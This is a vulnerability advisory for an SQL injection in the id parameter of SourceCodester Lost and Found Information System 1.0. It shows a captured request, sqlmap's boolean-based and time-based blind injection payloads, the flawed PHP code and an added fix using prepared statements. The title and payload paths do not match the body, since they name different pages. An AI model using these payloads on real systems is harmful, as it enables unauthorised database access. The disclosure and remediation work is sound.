Exploit Title: SOURCECODESTER LOST AND FOUND INFORMATION SYSTEM 1.0 GET PARAMETER ITEMS/VIEW.PHP ID SQL INJECTION
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/?page=categories/view_category of the component GET Parameter Handler. The manipulation of the argument id leads to SQL injection.
Date: 12 May 2023
Exploit Author: tht1997
Version: 1.0
Vulnerable endpoint: /admin/?page=categories/view_category&id=
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been classified as critical. This affects some unknown processing of the file admin/?page=categories/view_category of the component GET Parameter Handler. The manipulation of the argument id with an unknown input leads to an SQL injection vulnerability. CWE classifies the issue as CWE-89: the software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize, or incorrectly neutralizes, special elements that could modify the intended SQL command when it is sent to a downstream component. This has an impact on confidentiality, integrity, and availability.
The following steps are involved:
- Visit the vulnerable page: /php-lfis/admin/?page=categories/view_category&id=2
- Copy the request to a text file and run it with sqlmap.
Request:
GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/php-lfis/admin/?page=categories
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=kt5sfckl2e0fle94p3bdha9n45
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
- Result (sqlmap output):
---
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=categories/manage_category&id=2' AND 9413=9413 AND 'OfUY'='OfUY
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=categories/manage_category&id=2' AND (SELECT 1200 FROM (SELECT(SLEEP(5)))pTou) AND 'jydD'='jydD
---
- Vulnerable code:
<?php
// Category lookup as shipped in the application. The GET parameter `id` is
// interpolated directly into the SQL string, which is the CWE-89 defect
// described above: the only guard is the `> 0` comparison, which a string
// such as "2' AND ..." still satisfies.
if(isset($_GET['id']) && $_GET['id'] > 0){
    // Unparameterised query: `id` is concatenated into the statement text.
    $qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        // Each column of the first row is turned into a variable of the same name.
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=$v;
        }
    }else{
        echo '<script>alert("Category ID is not valid."); location.replace("./?page=categories")</script>';
    }
}else{
    echo '<script>alert("Category ID is Required."); location.replace("./?page=categories")</script>';
}
?>
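The following is an added example of how the same lookup can be written so that the `id` parameter cannot alter the query. It is not code from the project or from the advisory author. It assumes `$conn` is the application's mysqli connection object (as in the original snippet) built on mysqlnd, so that `get_result()` is available; the function name `fetch_category` is an assumption introduced here.

```php
<?php
// Added example (not the project's code): hardened version of the category lookup.
// Assumes $conn is the project's mysqli connection object (mysqlnd driver).

/**
 * Validate the id parameter and look the category up with a prepared statement.
 * Returns the row as an associative array, or null when the id is absent,
 * not a positive integer, or unknown.
 */
function fetch_category(mysqli $conn, array $get): ?array
{
    // 1. Input validation: the id must be a positive integer. FILTER_VALIDATE_INT
    //    rejects any non-numeric string (for example one containing quotes or
    //    SQL keywords) before it reaches the database layer at all.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterised query: the value travels separately from the SQL text, so
    //    it is always treated as data and can never change the statement's structure.
    $stmt = $conn->prepare('SELECT * FROM `category_list` WHERE `id` = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

$category = fetch_category($conn, $_GET);
if ($category === null) {
    // Keep the original's two messages, but emit them through json_encode so the
    // text is a well-formed JavaScript string literal.
    $msg = isset($_GET['id']) ? 'Category ID is not valid.' : 'Category ID is Required.';
    echo '<script>alert(' . json_encode($msg) . '); location.replace("./?page=categories")</script>';
    exit;
}

// The page can now read $category['name'], $category['id'], etc.
// The row is kept in an array rather than expanded into variable-variables
// ($$k = $v) as the original did, so column names never become local symbols.
```

Either layer on its own would stop the injection shown in the sqlmap output (the boolean- and time-based payloads are neither valid integers nor able to escape a bound parameter); using both means a future change to the validation does not silently reopen the query.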